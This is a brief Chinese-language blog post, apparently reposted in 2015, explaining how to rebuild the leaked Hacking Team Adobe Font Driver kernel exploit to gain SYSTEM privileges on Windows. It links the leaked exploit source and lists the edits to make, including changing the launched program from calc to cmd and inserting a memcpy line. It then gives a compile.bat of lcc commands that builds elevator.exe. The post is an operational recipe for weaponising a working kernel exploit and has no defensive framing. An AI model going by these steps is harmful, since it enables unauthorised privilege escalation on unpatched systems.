Hacking Team Adobe Font Driver 提权 快速利用介绍
三好学生 | 2015-07-15 11:22
0x00 目标
利用Hacking Team 的Adobe Font Driver内核漏洞代码,重新编译,获得系统权限。
0x01 测试环境
Windows 7 (32-bit)
0x02 样本分析
已知成功环境:
WindowsXP~Windows 8.1,X86和X64
0x03 样本测试
无
0x04 简单修改
此处举例说明如何修改source_pie_7:
1、下载代码
http://ht.transparencytoolkit.org/gitlab/Windows-Multi-Browser/2_stage_shellcode_source/
2、搭建开发环境
安装lcc.exe
3、修改文件
进入source_pie_7文件夹
编辑elevator.c:
去掉#include "font.h"(减小文件体积)
编辑loader.c:
添加#include "font.h"(添加字体文件)
L104 calc改为cmd(执行calc改为cmd)
在void Loader()第三行插入memcpy(pVtable.lpLoaderConfig->foofont,foofont,755256);(赋值)
4、编译
compile.bat写入如下代码,运行后生成elevator.exe
c:lccbinlcc.exe -c elevator.c
c:lccbinlcc.exe -c loader.c
c:lccbinlcclnk.exe -subsystem console -o elevator.exe elevator.obj loader.obj wtsapi32.lib crypt32.lib wininet.lib
del elevator.obj elevator.exp elevator.lib
del loader.obj loader.exp loader.lib
5、测试
文章来源于lcx.cc:Hacking Team Adobe Font Driver 提权 快速利用介绍
相关推荐: Information on recently-fixed Oracle VM VirtualBox vulnerabilities
Information on recently-fixed Oracle VM VirtualBox vulnerabilities From: Matthew Daley Date: Fri, 07 Feb 2014 15:27:39 +1300 Hi th…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论